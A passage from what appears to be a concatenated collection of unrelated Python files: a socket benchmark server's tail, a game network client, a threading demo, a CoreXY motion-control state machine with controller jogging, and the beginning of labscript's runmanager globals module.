imgs = imgs[:num_imgs]
for img in imgs:
with open(img, 'rb') as infile:
img_data.append(base64.b64encode(infile.read()).decode())
ip = "0.0.0.0"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, args.port))
sock.listen(5)
(clientsocket, addr) = sock.accept()
print("addr is", addr)
data = clientsocket.recv(msg_packer.size)
msg = msg_packer.unpack(data)[0]
clientsocket.send(msg_packer.pack(*(msg,)))
clientsocket.close()
assert msg == MSG_START, "Unexpected msg at start '{}'".format(msg)
# elapsed_time = poisson_individual_requests(args, num_imgs)
req_thread = Thread(target=poisson_individual_requests, args=(args, num_imgs))
req_thread.start()
print("Listening for another connection", flush=True)
(clientsocket, addr) = sock.accept()
data = clientsocket.recv(msg_packer.size)
msg = msg_packer.unpack(data)[0]
assert msg == MSG_STOP, "Unexpected msg at stop '{}'".format(msg)
print("Setting stop_feeding to true", flush=True)
stop_feeding = True
print("Waiting for thread to join", flush=True)
req_thread.join()
print("Thread joined", flush=True)
clientsocket.send(msg_packer.pack(*(msg,)))
clientsocket.close()
sock.close()
print("done")
|
client.py
|
import socket
import threading
import util
import main
host, port = '127.0.0.1', 10000
global players
players = None
global owned_player
owned_player = None
global sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
def mainloop():
while True:
data = sock.recv(1024)
if not data:
break
data_buffer = util.DataBuffer(data)
while len(data_buffer.remaining):
handle_packet(data_buffer.readByte(), data_buffer)
def handle_packet(packet_id, data_buffer):
if packet_id == util.PACKET_SPAWN:
try:
player_id = data_buffer.readSByte()
owned = data_buffer.readByte()
x = data_buffer.readShort()
y = data_buffer.readShort()
# clear the buffer
data_buffer.clear()
except:
return
if owned:
# create a new player instance as an owned object
player = main.Player(player_id, True)
#player_group.add(player)
#player_group.center(player.rect.center)
else:
player = main.Player(player_id, False)
player.x = x
player.y = y
players[player_id] = player
elif packet_id == util.PACKET_DESPAWN:
try:
player_id = data_buffer.readSByte()
# clear the buffer
data_buffer.clear()
except:
return
if player_id not in players:
return
del players[player_id]
elif packet_id == util.PACKET_POSITION_UPDATE:
try:
player_id = data_buffer.readSByte()
x = data_buffer.readShort()
y = data_buffer.readShort()
# clear the buffer
data_buffer.clear()
except:
return
if player_id not in players:
return
player = players[player_id]
player.x = x
player.y = y
def handle_send_request_spawn():
data_buffer = util.DataBuffer()
data_buffer.writeByte(util.PACKET_REQUEST_SPAWN)
sock.send(data_buffer.data)
def handle_send_position_update(player):
data_buffer = util.DataBuffer()
data_buffer.writeByte(util.PACKET_POSITION_UPDATE)
data_buffer.writeSByte(player.id)
data_buffer.writeShort(player.x)
data_buffer.writeShort(player.y)
sock.send(data_buffer.data)
def run_mainloop():
t = threading.Thread(target=mainloop)
t.daemon = True
t.start()
|
thread_01.py
|
import threading
def first_fun(age):
while True:
print('I am first child.', age)
pass
return
def second_fun(age):
while True:
print('I am second child.', age)
pass
return
if __name__== "__main__":
first = threading.Thread(target=first_fun , args = (5,))
second = threading.Thread(target=second_fun, args = (3,))
first.start()
second.start()
first.join() #연락을 했으니 전화를 받아야한다.
second.join()
while True:
print('I am child.')
pass
|
run_pinc.py
|
from serial_host import packet_definitions as pkt
from serial_host import cold_start, read, write
from kinematics import corexy_inverse, corexy_transform, z0, z1, z2, center_home
from marker_tracking import get_laser_displacement, run_tracking_loop, get_error, end_tracking_loop, enable_fiducial_sensing, enable_laser_sensing
from threading import Thread
import numpy as np
from time import time, sleep
from queue import Queue
import os
from xbox360controller import Xbox360Controller
from gcode_solver import GcodeSolver
from pinc_state import State
import sys
import logging
CONTROLLER_DEAD_ZONE = 0.2
CONTROLLER_JOG_RATE = 100
MAX_ACCELERATION = 1000
XY_MM_PER_RAD = 6.36619783227
Z_MM_PER_RAD = 0.795774715
HOMING_SPEED = 10
# ------ Debug Variables --------
errorx = 0
errory = 0
# -------------------------------
embedded_motors = {}
embedded_sensors = {}
jog_controller = None
with open('box_gcode.gcode', 'r') as f:
gcode = f.read()
path_planner = GcodeSolver(gcode)
state = None
event_queue = Queue()
def post_event(event):
event_queue.put(event)
def handle_events():
global state
if not event_queue.empty():
event = event_queue.get()
logging.info(event)
state = state.on_event(event)
class InitState(State):
def __init__(self):
super().__init__()
self.event_map['init'] = HomeState
# self.event_map['init'] = ManualState
def run(self):
post_event('init')
class JogState(State):
def __init__(self):
super().__init__()
self.xstart, self.ystart = corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4)
self.jog_time = 10
self.start_time = time()
self.x_target, self.y_target = 0, 0
self.xw_nominal, self.yw_nominal = 0, 0
def set_jog_target(self, x, y, time):
self.jog_time = time
self.x_target, self.y_target = x, y
self.xw_nominal = (self.x_target - self.xstart)/self.jog_time
self.yw_nominal = (self.y_target - self.ystart)/self.jog_time
def run(self):
self.xpos, self.ypos = corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4)
self.xvel, self.yvel = corexy_inverse(embedded_motors[3].omega, embedded_motors[4].omega)
interp = (time()-self.start_time)/self.jog_time
if interp >= 1:
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
post_event('jog done')
else:
x_nominal = interp*(self.x_target - self.xstart) + self.xstart
y_nominal = interp*(self.y_target - self.ystart) + self.ystart
x_error = x_nominal - self.xpos
y_error = y_nominal - self.ypos
control_x = x_error + self.xw_nominal
control_y = y_error + self.yw_nominal
control_3, control_4 = corexy_transform(control_x, control_y)
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=control_3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=control_4)
write(control_packet)
class HomeState(State):
def __init__(self):
super().__init__()
self.event_map['found home'] = FineHomeState
enable_fiducial_sensing()
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.DISABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=1)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=HOMING_SPEED)
write(control_packet)
e_x, e_y = get_error()
if e_x is not None or e_y is not None:
post_event('found home')
class FineHomeState(State):
home_3 = 0
home_4 = 0
def __init__(self):
super().__init__()
self.event_map['fine home complete'] = JogHomeCenterState
self.event_map['lost tracking'] = HomeState
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
global home_x, home_y
e_x, e_y = get_error()
if e_x is None or e_y is None:
post_event("lost tracking")
return
errorx = -e_x + e_y
errory = -e_x - e_y
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=-errory/10)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=-errorx/10)
write(control_packet)
if np.sqrt(errorx**2 + errory**2) < 1:
enable_laser_sensing()
FineHomeState.home_4 = embedded_motors[4].theta
FineHomeState.home_3 = embedded_motors[3].theta
post_event('fine home complete')
class JogHomeState(JogState):
def __init__(self):
super().__init__()
self.home_event = 'at home'
self.home_x = 30
self.home_y = 30
def run(self):
super().run()
errorx = self.home_x-self.xpos
errory = self.home_y-self.ypos
control_x = errorx*20 - self.xvel*10
control_y = errory*20 - self.yvel*20
control_3, control_4 = corexy_transform(control_x, control_y)
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_ALPHA, control=control_3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_ALPHA, control=control_4)
write(control_packet)
if np.sqrt(errorx**2 + errory**2) < .005:
post_event(self.home_event)
class HomeZState(State):
def __init__(self):
super().__init__()
enable_laser_sensing()
self.motor_index = 'all'
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[2].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[1].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[0].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
z_nominal = np.clip(get_laser_displacement()/10, -10, 10)
if self.motor_index == 'all':
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
write(control_packet)
else:
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
for motor in embedded_motors:
if embedded_motors[motor].motorId != self.motor_index:
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[motor].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
else:
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[self.motor_index].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
write(control_packet)
if z_nominal == 0:
post_event('z home')
class JogHomeCenterState(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeCenterState
self.set_jog_target(30, 30, 5)
class HomeCenterState(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = JogHome0State
class JogHome0State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ0State
self.set_jog_target(z0[0], z0[1], 5)
class HomeZ0State(HomeZState):
def __init__(self):
super().__init__()
self.motor_index = 0
self.event_map['z home'] = JogHome1State
class JogHome1State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ1State
self.set_jog_target(z1[0], z1[1], 5)
class HomeZ1State(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = JogHome2State
self.motor_index = 1
class JogHome2State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ2State
self.set_jog_target(z2[0], z2[1], 5)
class HomeZ2State(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = Jog00State
self.motor_index = 2
class Jog00State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = ManualState
self.set_jog_target(0, 0, 5)
class PrintState(JogState):
def __init__(self):
super().__init__()
self.start_time = time()
def run(self):
super().run()
global errorx, errory
KP = 5000
KP_VELOCITY = 1000
positions, velocities = path_planner.get_solution(time()-self.start_time)
position = positions[0]
x_nominal = position[0]/XY_MM_PER_RAD
y_nominal = position[1]/XY_MM_PER_RAD
z_nominal = position[2]/Z_MM_PER_RAD
x_velocity_nominal = velocities[0]/XY_MM_PER_RAD
y_velocity_nominal = velocities[1]/XY_MM_PER_RAD
z_velocity_nominal = velocities[2]/Z_MM_PER_RAD
v_errorx = x_velocity_nominal - self.xvel
v_errory = y_velocity_nominal - self.yvel
errorx = x_nominal - self.xpos
control_inputx = KP*errorx + KP_VELOCITY*v_errorx
errory = y_nominal - self.ypos
control_inputy = KP*errory + KP_VELOCITY*v_errory
control3, control4 = corexy_transform(control_inputx, control_inputy)
# errorz2 = z_nominal - embedded_motors[2].theta
# control_inputz2 = KP*errorz2 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[2].omega)
# errorz1 = z_nominal - embedded_motors[1].theta
# control_inputz1 = KP*errorz1 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[1].omega)
# errorz0 = z_nominal - embedded_motors[0].theta
# control_inputz0 = KP*errorz0 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[0].omega)
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_ALPHA, control=control4)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_ALPHA, control=control3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
write(control_packet)
class ManualState(State):
Z_JOG = 30
XY_JOG = 20
def __init__(self):
super().__init__()
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[2].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[1].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[0].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
if jog_controller.button_a.is_pressed:
z_nominal = (controller.trigger_l.value - controller.trigger_r.value)
if abs(z_nominal) < .2:
z_nominal = 0
z_nominal *= ManualState.Z_JOG
x_nominal = controller.axis_l.x
if abs(x_nominal) < .2:
x_nominal = 0
x_nominal *= ManualState.XY_JOG
y_nominal = controller.axis_l.y
if abs(y_nominal) < .2:
y_nominal = 0
y_nominal *= ManualState.XY_JOG
else:
z_nominal = 0
y_nominal = 0
x_nominal = 0
motor_3_control, motor_4_control = corexy_transform(x_nominal, y_nominal)
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=motor_3_control)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=motor_4_control)
write(control_packet)
def embedded_service():
global state
state = InitState()
while True:
hid_msg = read()
header = pkt.unpack_HeaderPacket(hid_msg[:pkt.size_HeaderPacket])
unpack_index = pkt.size_HeaderPacket
for i in range(header.motorCount):
motor_packet = pkt.unpack_MotorStatePacket(
hid_msg[unpack_index:unpack_index+pkt.size_MotorStatePacket])
embedded_motors[motor_packet.motorId] = motor_packet
unpack_index += pkt.size_MotorStatePacket
for i in range(header.sensorCount):
sensor_packet = pkt.unpack_SensorPacket(
hid_msg[unpack_index:unpack_index+pkt.size_SensorPacket])
embedded_sensors[sensor_packet.sensorId] = sensor_packet
unpack_index += pkt.size_SensorPacket
handle_events()
state.run()
if __name__ == "__main__":
os.system(f"taskset -p -c 3 {os.getpid()}")
cold_start(sys.argv[1])
with Xbox360Controller(0, axis_threshold=0.2) as controller:
start_time = time()
jog_controller = controller
tracking_thread = Thread(target=run_tracking_loop, daemon=True)
tracking_thread.start()
print("Started tracking")
sleep(2)
embedded_thread = Thread(target=embedded_service, daemon=True)
embedded_thread.start()
print("Started controls")
while True:
sleep(1)
# print(embedded_motors[4].theta, embedded_motors[3].theta, errorx, errory)
# print(-100/XY_MM_PER_RAD, embedded_motors[3].theta, home_y)
# print((-100/XY_MM_PER_RAD + home_y) - embedded_motors[3].theta)
# print(state)
# pos_error = math.sqrt(errorx**2 + errory**2)*XY_MM_PER_RAD
# vel_error = math.sqrt(v_errorx**2 + v_errory**2)*XY_MM_PER_RAD
# print(str(pos_error).ljust(30, ' '))
# print(str(pos_error))
# pos, vel = path_planner.get_solution(time()-start_time)
# print(pos[0], vel)
print(embedded_motors, state, jog_controller.button_a.is_pressed)
# print(get_laser_displacement(), get_error(), state, controller.trigger_l.value)
# print(corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4))
|
__init__.py
|
#####################################################################
# #
# /__init__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import itertools
import os
import sys
import random
import time
import subprocess
import types
import threading
import traceback
import labscript_utils.h5_lock
import h5py
import numpy as np
import zprocess
__version__ = '2.1.0'
def _ensure_str(s):
"""convert bytestrings and numpy strings to python strings"""
return s.decode() if isinstance(s, bytes) else str(s)
def is_valid_python_identifier(name):
import tokenize
if PY2:
import StringIO as io
else:
import io
try:
tokens = list(tokenize.generate_tokens(io.StringIO(name).readline))
except tokenize.TokenError:
return False
if len(tokens) == 2:
(token_type, _, _, _, _), _ = tokens
return token_type == tokenize.NAME
return False
class ExpansionError(Exception):
"""An exception class so that error handling code can tell when a
parsing exception was caused by a mismatch with the expansion mode"""
pass
class TraceDictionary(dict):
def __init__(self, *args, **kwargs):
self.trace_data = None
dict.__init__(self, *args, **kwargs)
def start_trace(self):
self.trace_data = []
def __getitem__(self, key):
if self.trace_data is not None:
if key not in self.trace_data:
self.trace_data.append(key)
return dict.__getitem__(self, key)
def stop_trace(self):
trace_data = self.trace_data
self.trace_data = None
return trace_data
def new_globals_file(filename):
with h5py.File(filename, 'w') as f:
f.create_group('globals')
def add_expansion_groups(filename):
"""backward compatability, for globals files which don't have
expansion groups. Create them if they don't exist. Guess expansion
settings based on datatypes, if possible."""
# DEPRECATED
# Don't open in write mode unless we have to:
with h5py.File(filename, 'r') as f:
requires_expansion_group = []
for groupname in f['globals']:
group = f['globals'][groupname]
if not 'expansion' in group:
requires_expansion_group.append(groupname)
if requires_expansion_group:
group_globalslists = [get_globalslist(filename, groupname) for groupname in requires_expansion_group]
with h5py.File(filename, 'a') as f:
for groupname, globalslist in zip(requires_expansion_group, group_globalslists):
group = f['globals'][groupname]
subgroup = group.create_group('expansion')
# Initialise all expansion settings to blank strings:
for name in globalslist:
subgroup.attrs[name] = ''
groups = {group_name: filename for group_name in get_grouplist(filename)}
sequence_globals = get_globals(groups)
evaled_globals, global_hierarchy, expansions = evaluate_globals(sequence_globals, raise_exceptions=False)
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
expansion = guess_expansion_type(value)
set_expansion(filename, group_name, global_name, expansion)
def get_grouplist(filename):
# For backward compatability, add 'expansion' settings to this
# globals file, if it doesn't contain any. Guess expansion settings
# if possible.
# DEPRECATED
add_expansion_groups(filename)
with h5py.File(filename, 'r') as f:
grouplist = f['globals']
# File closes after this function call, so have to
# convert the grouplist generator to a list of strings
# before its file gets dereferenced:
return list(grouplist)
def new_group(filename, groupname):
with h5py.File(filename, 'a') as f:
if groupname in f['globals']:
raise Exception('Can\'t create group: target name already exists.')
group = f['globals'].create_group(groupname)
group.create_group('units')
group.create_group('expansion')
def copy_group(source_globals_file, source_groupname, dest_globals_file, delete_source_group=False):
""" This function copies the group source_groupname from source_globals_file
to dest_globals_file and renames the new group so that there is no name
collision. If delete_source_group is False the copyied files have
a suffix '_copy'."""
with h5py.File(source_globals_file, 'a') as source_f:
# check if group exists
if source_groupname not in source_f['globals']:
raise Exception('Can\'t copy there is no group "{}"!'.format(source_groupname))
# Are we coping from one file to another?
if dest_globals_file is not None and source_globals_file != dest_globals_file:
dest_f = h5py.File(dest_globals_file, 'a') # yes -> open dest_globals_file
else:
dest_f = source_f # no -> dest files is source file
# rename Group until there is no name collisions
i = 0 if not delete_source_group else 1
dest_groupname = source_groupname
while dest_groupname in dest_f['globals']:
dest_groupname = "{}({})".format(dest_groupname, i) if i > 0 else "{}_copy".format(dest_groupname)
i += 1
# copy group
dest_f.copy(source_f['globals'][source_groupname], '/globals/%s' % dest_groupname)
# close opend file
if dest_f != source_f:
dest_f.close()
return dest_groupname
def rename_group(filename, oldgroupname, newgroupname):
if oldgroupname == newgroupname:
# No rename!
return
with h5py.File(filename, 'a') as f:
if newgroupname in f['globals']:
raise Exception('Can\'t rename group: target name already exists.')
f.copy(f['globals'][oldgroupname], '/globals/%s' % newgroupname)
del f['globals'][oldgroupname]
def delete_group(filename, groupname):
with h5py.File(filename, 'a') as f:
del f['globals'][groupname]
def get_globalslist(filename, groupname):
with h5py.File(filename, 'r') as f:
group = f['globals'][groupname]
# File closes after this function call, so have to convert
# the attrs to a dict before its file gets dereferenced:
return dict(group.attrs)
def new_global(filename, groupname, globalname):
if not is_valid_python_identifier(globalname):
raise ValueError('%s is not a valid Python variable name'%globalname)
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
if globalname in group.attrs:
raise Exception('Can\'t create global: target name already exists.')
group.attrs[globalname] = ''
f['globals'][groupname]['units'].attrs[globalname] = ''
f['globals'][groupname]['expansion'].attrs[globalname] = ''
def rename_global(filename, groupname, oldglobalname, newglobalname):
if oldglobalname == newglobalname:
# No rename!
return
if not is_valid_python_identifier(newglobalname):
raise ValueError('%s is not a valid Python variable name'%newglobalname)
value = get_value(filename, groupname, oldglobalname)
units = get_units(filename, groupname, oldglobalname)
expansion = get_expansion(filename, groupname, oldglobalname)
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
if newglobalname in group.attrs:
raise Exception('Can\'t rename global: target name already exists.')
group.attrs[newglobalname] = value
group['units'].attrs[newglobalname] = units
group['expansion'].attrs[newglobalname] = expansion
del group.attrs[oldglobalname]
del group['units'].attrs[oldglobalname]
del group['expansion'].attrs[oldglobalname]
def get_value(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_value(filename, groupname, globalname, value):
with h5py.File(filename, 'a') as f:
f['globals'][groupname].attrs[globalname] = value
def get_units(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname]['units'].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_units(filename, groupname, globalname, units):
with h5py.File(filename, 'a') as f:
f['globals'][groupname]['units'].attrs[globalname] = units
def get_expansion(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname]['expansion'].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_expansion(filename, groupname, globalname, expansion):
with h5py.File(filename, 'a') as f:
f['globals'][groupname]['expansion'].attrs[globalname] = expansion
def delete_global(filename, groupname, globalname):
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
del group.attrs[globalname]
def guess_expansion_type(value):
if isinstance(value, np.ndarray) or isinstance(value, list):
return u'outer'
else:
return u''
def iterator_to_tuple(iterator, max_length=1000000):
# We want to prevent infinite length tuples, but we cannot know
# whether they are infinite or not in advance. So we'll convert to
# a tuple only if the length is less than max_length:
temp_list = []
for i, element in enumerate(iterator):
temp_list.append(element)
if i == max_length:
raise ValueError('This iterator is very long, possibly infinite. ' +
'Runmanager cannot create an infinite number of shots. ' +
'If you really want an iterator longer than %d, ' % max_length +
'please modify runmanager.iterator_to_tuple and increase max_length.')
return tuple(temp_list)
def get_all_groups(h5_files):
"""returns a dictionary of group_name: h5_path pairs from a list of h5_files."""
if isinstance(h5_files, bytes) or isinstance(h5_files, str):
h5_files = [h5_files]
groups = {}
for path in h5_files:
for group_name in get_grouplist(path):
if group_name in groups:
raise ValueError('Error: group %s is defined in both %s and %s. ' % (group_name, groups[group_name], path) +
'Only uniquely named groups can be used together '
'to make a run file.')
groups[group_name] = path
return groups
def get_globals(groups):
"""Takes a dictionary of group_name: h5_file pairs and pulls the
globals out of the groups in their files. The globals are strings
storing python expressions at this point. All these globals are
packed into a new dictionary, keyed by group_name, where the values
are dictionaries which look like {global_name: (expression, units, expansion), ...}"""
# get a list of filepaths:
filepaths = set(groups.values())
sequence_globals = {}
for filepath in filepaths:
groups_from_this_file = [g for g, f in groups.items() if f == filepath]
with h5py.File(filepath, 'r') as f:
for group_name in groups_from_this_file:
sequence_globals[group_name] = {}
globals_group = f['globals'][group_name]
values = dict(globals_group.attrs)
units = dict(globals_group['units'].attrs)
expansions = dict(globals_group['expansion'].attrs)
for global_name, value in values.items():
unit = units[global_name]
expansion = expansions[global_name]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
unit = _ensure_str(unit)
expansion = _ensure_str(expansion)
sequence_globals[group_name][global_name] = value, unit, expansion
return sequence_globals
def evaluate_globals(sequence_globals, raise_exceptions=True):
"""Takes a dictionary of globals as returned by get_globals. These
globals are unevaluated strings. Evaluates them all in the same
namespace so that the expressions can refer to each other. Iterates
to allow for NameErrors to be resolved by subsequently defined
globals. Throws an exception if this does not result in all errors
going away. The exception contains the messages of all exceptions
which failed to be resolved. If raise_exceptions is False, any
evaluations resulting in an exception will instead return the
exception object in the results dictionary"""
# Flatten all the groups into one dictionary of {global_name:
# expression} pairs. Also create the group structure of the results
# dict, which has the same structure as sequence_globals:
all_globals = {}
results = {}
expansions = {}
global_hierarchy = {}
# Pre-fill the results dictionary with groups, this is needed for
# storing exceptions in the case of globals with the same name being
# defined in multiple groups (all of them get the exception):
for group_name in sequence_globals:
results[group_name] = {}
multiply_defined_globals = set()
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
if global_name in all_globals:
# The same global is defined twice. Either raise an
# exception, or store the exception for each place it is
# defined, depending on whether raise_exceptions is True:
groups_with_same_global = []
for other_group_name in sequence_globals:
if global_name in sequence_globals[other_group_name]:
groups_with_same_global.append(other_group_name)
exception = ValueError('Global named \'%s\' is defined in multiple active groups:\n ' % global_name +
'\n '.join(groups_with_same_global))
if raise_exceptions:
raise exception
for other_group_name in groups_with_same_global:
results[other_group_name][global_name] = exception
multiply_defined_globals.add(global_name)
all_globals[global_name], units, expansion = sequence_globals[group_name][global_name]
expansions[global_name] = expansion
# Do not attempt to evaluate globals which are multiply defined:
for global_name in multiply_defined_globals:
del all_globals[global_name]
# Eval the expressions in the same namespace as each other:
evaled_globals = {}
# we use a "TraceDictionary" to track which globals another global depends on
sandbox = TraceDictionary()
exec('from pylab import *', sandbox, sandbox)
exec('from runmanager.functions import *', sandbox, sandbox)
globals_to_eval = all_globals.copy()
previous_errors = -1
while globals_to_eval:
errors = []
for global_name, expression in globals_to_eval.copy().items():
# start the trace to determine which globals this global depends on
sandbox.start_trace()
try:
code = compile(expression, '<string>', 'eval')
value = eval(code, sandbox)
# Need to know the length of any generators, convert to tuple:
if isinstance(value, types.GeneratorType):
value = iterator_to_tuple(value)
# Make sure if we're zipping or outer-producting this value, that it can
# be iterated over:
if expansions[global_name] == 'outer':
try:
iter(value)
except Exception as e:
raise ExpansionError(str(e))
except Exception as e:
# Don't raise, just append the error to a list, we'll display them all later.
errors.append((global_name, e))
sandbox.stop_trace()
continue
# Put the global into the namespace so other globals can use it:
sandbox[global_name] = value
del globals_to_eval[global_name]
evaled_globals[global_name] = value
# get the results from the global trace
trace_data = sandbox.stop_trace()
# Only store names of globals (not other functions)
for key in list(trace_data): # copy the list before iterating over it
if key not in all_globals:
trace_data.remove(key)
if trace_data:
global_hierarchy[global_name] = trace_data
if len(errors) == previous_errors:
# Since some globals may refer to others, we expect maybe
# some NameErrors to have occured. There should be fewer
# NameErrors each iteration of this while loop, as globals
# that are required become defined. If there are not fewer
# errors, then there is something else wrong and we should
# raise it.
if raise_exceptions:
message = 'Error parsing globals:\n'
for global_name, exception in errors:
